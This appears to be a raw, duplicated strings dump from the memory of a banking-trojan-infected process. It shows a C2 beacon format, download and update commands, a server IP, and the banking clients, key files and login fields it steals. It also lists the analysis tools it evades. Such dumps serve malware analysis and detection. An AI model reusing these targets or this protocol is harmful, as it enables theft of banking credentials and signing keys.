Content-Disposition: form-data; name="file"; filename="report"
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.bing.com
VVV.microsoft.com
VVV.microsoft.com
frd.exe
frd.exe
command=config&update_url=
command=config&update_url=
/search.php
/search.php
&port=
&port=
command=load&url=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\chrome.exe
\svchost.exe
\svchost.exe
\java.exe
\java.exe
\javaw.exe
\javaw.exe
\javaws.exe
\javaws.exe
\opera.exe
\opera.exe
\firefox.exe
\firefox.exe
\maxthon.exe
\maxthon.exe
\avant.exe
\avant.exe
\mnp.exe
\mnp.exe
\safari.exe
\safari.exe
\netscape.exe
\netscape.exe
\tbb-firefox.exe
\tbb-firefox.exe
\frd.exe
\frd.exe
\isclient.exe
\isclient.exe
\ipc_full.exe
\ipc_full.exe
\intpro.exe
\intpro.exe
\cbsmain.dll
\cbsmain.dll
\clmain.exe
\clmain.exe
\core.exe
\core.exe
\rundll32.exe
\rundll32.exe
\notepad.exe
\notepad.exe
\cbank.exe
\cbank.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
%s.dbf
%s.dbf
%s.DBF
%s.DBF
j_password=
j_password=
pass.log
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edClientLogin=
edUserLogin=
edUserLogin=
edPassword=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
&LOGIN_AUTHORIZATION_CODE=
login=
login=
password=
password=
pass_
pass_
advapi32.dll
advapi32.dll
path.txt
path.txt
keys.zip
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
%s\d.bmp
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
keys
private.txt
private.txt
public.txt
public.txt
\*.key
\*.key
\self.cer
\self.cer
self.cer
self.cer
self.pub
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.exe
ctunnel.zip
ctunnel.zip
path_ctunnel.txt
path_ctunnel.txt
header.key
header.key
keys99
keys99
\header.key
\header.key
masks2.key
masks2.key
\masks2.key
\masks2.key
masks.key
masks.key
\masks.key
\masks.key
\name.key
\name.key
primary2.key
primary2.key
\primary2.key
\primary2.key
primary.key
primary.key
\primary.key
\primary.key
keys99.zip
keys99.zip
path99.txt
path99.txt
bsi.dll
bsi.dll
&domain=letitbit.net&
&domain=letitbit.net&
cc.txt
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
prv_key.pfx
keys\
keys\
sign.cer
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
sks2xyz.dll
vb_pfx_import
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
secret.key
pubkeys.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
path1.txt
inter.zip
inter.zip
interpro.ini
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
cbsmain.dll
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
FilialRCon.dll
ISClient.cfg
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
rfk.zip
client.zip
client.zip
path_client.txt
path_client.txt
path_keys.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
Agava_Client.exe
KeysDiskPath
KeysDiskPath
Agava_Client.ini
Agava_Client.ini
Agava_keys
Agava_keys
keys_path.txt
keys_path.txt
mespro.dll
mespro.dll
AddPSEPrivateKeyEx
AddPSEPrivateKeyEx
core.exe
core.exe
data\id.dbf
data\id.dbf
\data\id.dbf
\data\id.dbf
keys%i.zip
keys%i.zip
path%i.txt
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
winmm.dll
%s\%s
%s\%s
LibVNCServer 0.9.7
LibVNCServer 0.9.7
%s (%s)
%s (%s)
d/d/d d:d
d/d/d d:d
password check failed!
password check failed!
WinSCard.dll
WinSCard.dll
SensApi.dll
SensApi.dll
GetTcpTable
GetTcpTable
IPHLPAPI.DLL
IPHLPAPI.DLL
dbghelp.dll
dbghelp.dll
MSVCRT.dll
MSVCRT.dll
PSAPI.DLL
PSAPI.DLL
NETAPI32.dll
NETAPI32.dll
DNSAPI.dll
DNSAPI.dll
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
ShellExecuteA
ShellExecuteA
SHFileOperationA
SHFileOperationA
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetSystemWindowsDirectoryA
GetProcessHeap
GetProcessHeap
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
MapVirtualKeyW
MapVirtualKeyW
SetKeyboardState
SetKeyboardState
EnumChildWindows
EnumChildWindows
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegFlushKey
RegFlushKey
RegEnumKeyExA
RegEnumKeyExA
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegDeleteKeyA
RegDeleteKeyA
ADVAPI32.dll
ADVAPI32.dll
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
MSCTF.Shared.MAPPING.%x
MSCTF.Shared.MAPPING.%x
Desk_%u%x
Desk_%u%x
MSCTF.Shared.MUTEX.%x
MSCTF.Shared.MUTEX.%x
.Prev
.Prev
.current
.current
SYSTEM!XP1!F9BE9A8A
SYSTEM!XP1!F9BE9A8A
%Documents and Settings%\%current user%\Application Data\
%Documents and Settings%\%current user%\Application Data\
1-191j1w1}1
1-191j1w1}1
?"?(?-?~?
?"?(?-?~?
;-;5;=;^;|;
;-;5;=;^;|;
7"7)7\7~7
7"7)7\7~7
6 6$6(6,6064686
6 6$6(6,6064686
`.data
`.data
mavast.com
mavast.com
ya.ru
ya.ru
serverkey.dat
serverkey.dat
\windows\
\windows\
svchost.exe_932_rwx_00ED0000_0005B000:
.text
.text
`.data
`.data
.reloc
.reloc
`.rdata
`.rdata
@.data
@.data
http
http
PSShL
PSShL
SSShp
SSShp
tUSSSh
tUSSSh
SSShp;
SSShp;
SSSh0
SSSh0
SSShpk
SSShpk
SSShpF
SSShpF
t9SSSh
t9SSSh
u1SSShP
u1SSShP
name.key
name.key
\secrets.key
\secrets.key
sign.key
sign.key
kernel32.dll
kernel32.dll
\explorer.exe
\explorer.exe
user32.dll
user32.dll
multi_pot.exe
multi_pot.exe
HookExplorer.exe
HookExplorer.exe
proc_analyzer.exe
proc_analyzer.exe
sckTool.exe
sckTool.exe
sniff_hit.exe
sniff_hit.exe
sysAnalyzer.exe
sysAnalyzer.exe
idag.exe
idag.exe
ollydbg.exe
ollydbg.exe
dumpcap.exe
dumpcap.exe
wireshark.exe
wireshark.exe
C:\iDEFENSE
C:\iDEFENSE
\\.\NPF_NdisWanIp
\\.\NPF_NdisWanIp
avp.exe
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
software\microsoft\windows\currentversion\run
\winlogon.exe
\winlogon.exe
sysinfo.log
sysinfo.log
scr.bmp
scr.bmp
minidump.bin
minidump.bin
%d.%d.%d.%d
%d.%d.%d.%d
à %dh %dm
à %dh %dm
%s:%d
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
Software\Microsoft\Internet Explorer\TypedURLs
url%i
url%i
4.4.10
4.4.10
%dx%d@%d
%dx%d@%d
%c%d:d
%c%d:d
{Windows directory:
{Windows directory:
links.log
links.log
\History.IE5\index.dat
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
\Opera\Opera\typed_history.xml
avast.com
avast.com
93.191.13.100
93.191.13.100
drweb
drweb
eset.com
eset.com
z-oleg.com
z-oleg.com
kltest.org.ru
kltest.org.ru
.comodo.com
.comodo.com
google.com
google.com
Dnsapi.dll
Dnsapi.dll
ws2_32.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
/login.php
ntdll.dll
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
Global\HighMemoryEvent_x
explorer.exe
explorer.exe
1.2.5
1.2.5
- zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
- zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
Winmm.dll
Winmm.dll
Kernel32.dll
Kernel32.dll
Gdi32.dll
Gdi32.dll
hXXp://
hXXp://
hXXps://
hXXps://
HTTP/1.
HTTP/1.
nspr4.dll
nspr4.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
[[[URL: %s
[[[URL: %s
Process: %s
Process: %s
User-agent: %s]]]
User-agent: %s]]]
{{{%s
{{{%s
Crypt32.dll
Crypt32.dll
CertVerifyCertificateChainPolicy
CertVerifyCertificateChainPolicy
Wininet.dll
Wininet.dll
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
set_url
set_url
microsoft.public.win32.programmer.kernel
microsoft.public.win32.programmer.kernel
\iexplore.exe
\iexplore.exe
keygrab
keygrab
u.bmp
u.bmp
\\.\PhysicalDrive%u
\\.\PhysicalDrive%u
/topic.php
/topic.php
keylog.txt
keylog.txt
passwords.txt
passwords.txt
%s%u.zip
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.bing.com
VVV.microsoft.com
VVV.microsoft.com
frd.exe
frd.exe
command=config&update_url=
command=config&update_url=
/search.php
/search.php
&port=
&port=
command=load&url=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\chrome.exe
\svchost.exe
\svchost.exe
\java.exe
\java.exe
\javaw.exe
\javaw.exe
\javaws.exe
\javaws.exe
\opera.exe
\opera.exe
\firefox.exe
\firefox.exe
\maxthon.exe
\maxthon.exe
\avant.exe
\avant.exe
\mnp.exe
\mnp.exe
\safari.exe
\safari.exe
\netscape.exe
\netscape.exe
\tbb-firefox.exe
\tbb-firefox.exe
\frd.exe
\frd.exe
\isclient.exe
\isclient.exe
\ipc_full.exe
\ipc_full.exe
\intpro.exe
\intpro.exe
\cbsmain.dll
\cbsmain.dll
\clmain.exe
\clmain.exe
\core.exe
\core.exe
\rundll32.exe
\rundll32.exe
\notepad.exe
\notepad.exe
\cbank.exe
\cbank.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
%s.dbf
%s.dbf
%s.DBF
%s.DBF
j_password=
j_password=
pass.log
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edClientLogin=
edUserLogin=
edUserLogin=
edPassword=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
&LOGIN_AUTHORIZATION_CODE=
login=
login=
password=
password=
pass_
pass_
advapi32.dll
advapi32.dll
path.txt
path.txt
keys.zip
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
%s\d.bmp
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
keys
private.txt
private.txt
public.txt
public.txt
\*.key
\*.key
\self.cer
\self.cer
self.cer
self.cer
self.pub
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.exe
ctunnel.zip
ctunnel.zip
path_ctunnel.txt
path_ctunnel.txt
header.key
header.key
keys99
keys99
\header.key
\header.key
masks2.key
masks2.key
\masks2.key
\masks2.key
masks.key
masks.key
\masks.key
\masks.key
\name.key
\name.key
primary2.key
primary2.key
\primary2.key
\primary2.key
primary.key
primary.key
\primary.key
\primary.key
keys99.zip
keys99.zip
path99.txt
path99.txt
bsi.dll
bsi.dll
&domain=letitbit.net&
&domain=letitbit.net&
cc.txt
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
prv_key.pfx
keys\
keys\
sign.cer
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
sks2xyz.dll
vb_pfx_import
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
secret.key
pubkeys.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
path1.txt
inter.zip
inter.zip
interpro.ini
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
cbsmain.dll
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
FilialRCon.dll
ISClient.cfg
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
rfk.zip
client.zip
client.zip
path_client.txt
path_client.txt
path_keys.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
Agava_Client.exe
KeysDiskPath
KeysDiskPath
Agava_Client.ini
Agava_Client.ini
Agava_keys
Agava_keys
keys_path.txt
keys_path.txt
mespro.dll
mespro.dll
AddPSEPrivateKeyEx
AddPSEPrivateKeyEx
core.exe
core.exe
data\id.dbf
data\id.dbf
\data\id.dbf
\data\id.dbf
keys%i.zip
keys%i.zip
path%i.txt
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
winmm.dll
%s\%s
%s\%s
LibVNCServer 0.9.7
LibVNCServer 0.9.7
%s (%s)
%s (%s)
d/d/d d:d
d/d/d d:d
password check failed!
password check failed!
WinSCard.dll
WinSCard.dll
SensApi.dll
SensApi.dll
GetTcpTable
GetTcpTable
IPHLPAPI.DLL
IPHLPAPI.DLL
dbghelp.dll
dbghelp.dll
MSVCRT.dll
MSVCRT.dll
PSAPI.DLL
PSAPI.DLL
NETAPI32.dll
NETAPI32.dll
DNSAPI.dll
DNSAPI.dll
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
ShellExecuteA
ShellExecuteA
SHFileOperationA
SHFileOperationA
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetSystemWindowsDirectoryA
GetProcessHeap
GetProcessHeap
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
MapVirtualKeyW
MapVirtualKeyW
SetKeyboardState
SetKeyboardState
EnumChildWindows
EnumChildWindows
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegFlushKey
RegFlushKey
RegEnumKeyExA
RegEnumKeyExA
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegDeleteKeyA
RegDeleteKeyA
ADVAPI32.dll
ADVAPI32.dll
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
MSCTF.Shared.MAPPING.%x
MSCTF.Shared.MAPPING.%x
Desk_%u%x
Desk_%u%x
MSCTF.Shared.MUTEX.%x
MSCTF.Shared.MUTEX.%x
.Prev
.Prev
.current
.current
1-191j1w1}1
1-191j1w1}1
?"?(?-?~?
?"?(?-?~?
;-;5;=;^;|;
;-;5;=;^;|;
7"7)7\7~7
7"7)7\7~7
6 6$6(6,6064686
6 6$6(6,6064686
mavast.com
mavast.com
ya.ru
ya.ru
serverkey.dat
serverkey.dat
\windows\
\windows\
svchost.exe_932_rwx_00F30000_0006A000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
http
http
PSShL
PSShL
SSShp
SSShp
tUSSSh
tUSSSh
SSShp;
SSShp;
SSSh0
SSSh0
SSShpk
SSShpk
SSShpF
SSShpF
t9SSSh
t9SSSh
u1SSShP
u1SSShP
name.key
name.key
\secrets.key
\secrets.key
sign.key
sign.key
kernel32.dll
kernel32.dll
\explorer.exe
\explorer.exe
user32.dll
user32.dll
multi_pot.exe
multi_pot.exe
HookExplorer.exe
HookExplorer.exe
proc_analyzer.exe
proc_analyzer.exe
sckTool.exe
sckTool.exe
sniff_hit.exe
sniff_hit.exe
sysAnalyzer.exe
sysAnalyzer.exe
idag.exe
idag.exe
ollydbg.exe
ollydbg.exe
dumpcap.exe
dumpcap.exe
wireshark.exe
wireshark.exe
C:\iDEFENSE
C:\iDEFENSE
\\.\NPF_NdisWanIp
\\.\NPF_NdisWanIp
avp.exe
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
software\microsoft\windows\currentversion\run
\winlogon.exe
\winlogon.exe
sysinfo.log
sysinfo.log
scr.bmp
scr.bmp
minidump.bin
minidump.bin
%d.%d.%d.%d
%d.%d.%d.%d
à %dh %dm
à %dh %dm
%s:%d
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
Software\Microsoft\Internet Explorer\TypedURLs
url%i
url%i
4.4.10
4.4.10
%dx%d@%d
%dx%d@%d
%c%d:d
%c%d:d
{Windows directory:
{Windows directory:
links.log
links.log
\History.IE5\index.dat
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
\Opera\Opera\typed_history.xml
avast.com
avast.com
93.191.13.100
93.191.13.100
drweb
drweb
eset.com
eset.com
z-oleg.com
z-oleg.com
kltest.org.ru
kltest.org.ru
.comodo.com
.comodo.com
google.com
google.com
Dnsapi.dll
Dnsapi.dll
ws2_32.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
/login.php
ntdll.dll
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
Global\HighMemoryEvent_x
explorer.exe
explorer.exe
1.2.5
1.2.5
- zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
- zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
Winmm.dll
Winmm.dll
Kernel32.dll
Kernel32.dll
Gdi32.dll
Gdi32.dll
hXXp://
hXXp://
hXXps://
hXXps://
HTTP/1.
HTTP/1.
nspr4.dll
nspr4.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
[[[URL: %s
[[[URL: %s
Process: %s
Process: %s
User-agent: %s]]]
User-agent: %s]]]
{{{%s
{{{%s
Crypt32.dll
Crypt32.dll
CertVerifyCertificateChainPolicy
CertVerifyCertificateChainPolicy
Wininet.dll
Wininet.dll
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
set_url
set_url
microsoft.public.win32.programmer.kernel
microsoft.public.win32.programmer.kernel
\iexplore.exe
\iexplore.exe
keygrab
keygrab
u.bmp
u.bmp
\\.\PhysicalDrive%u
\\.\PhysicalDrive%u
/topic.php
/topic.php
keylog.txt
keylog.txt
passwords.txt
